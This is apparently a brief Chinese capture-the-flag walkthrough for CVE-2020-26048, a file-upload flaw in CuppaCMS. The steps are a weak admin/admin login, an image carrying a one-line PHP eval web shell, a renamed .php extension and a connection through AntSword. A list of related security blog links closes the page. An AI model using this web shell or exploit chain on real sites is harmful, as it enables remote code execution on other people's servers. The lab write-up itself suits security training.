春秋云境CVE-2020-26048

简介

CuppaCMS是一套内容管理系统(CMS)。 CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从而导致远程任意代码执行。

正文

1.进入靶场

2.弱口令登录admin\admin

3.上传一句话木马图片

复制代码
<?php @eval($_POST['cmd']);?>

4.删除配置文件

5.重命名图片,抓包更改文件后缀

6.蚁剑连接

7.得到flag

相关推荐
MartinYeung58 小时前
[论文学习]ProAct:针对LLM越狱的主动防禦框架
网络·学习·安全
云水一下8 小时前
零基础玩转bWAPP靶场(五十八):XSS - Stored (User-Agent)
web安全·xss·bwapp·user-agent·stored
发量惊人的中年网工8 小时前
中小企业网络管理进阶:从设备堆叠到统一管理
服务器·网络·安全·网络安全·php·制造
workflower8 小时前
案例 :某交通厅基于AI技术的智能安全运营实践
网络·人工智能·安全·设计模式·机器人
测开小菜鸟9 小时前
智能体安全与伦理测试:守护AI的“底线”,让智能体安全、负责任地工作
网络·人工智能·安全
摸鱼停不住先生11 小时前
不安全反序列化利用篇(四):预构建 Gadget Chain——从反序列化检测到框架利用
开发语言·python·安全
小新讲网安11 小时前
PowerShell安全攻防实战:从渗透利用到检测防御全攻略
安全·web安全·网络安全·黑客·自动化·sqlmap·网安
天疆说12 小时前
02 API 鉴权与腾讯云公网桥接:把局域网模型服务安全地挂到域名上
安全·云计算·腾讯云
天山@12312 小时前
内网横向移动实验:从IPC到PTT的完整攻击链
网络安全·内网横向移动
嘟哩DuliDuli13 小时前
AI 账单变高的技术原因:重复上下文和用量归属
android·人工智能·安全·ai·软件工程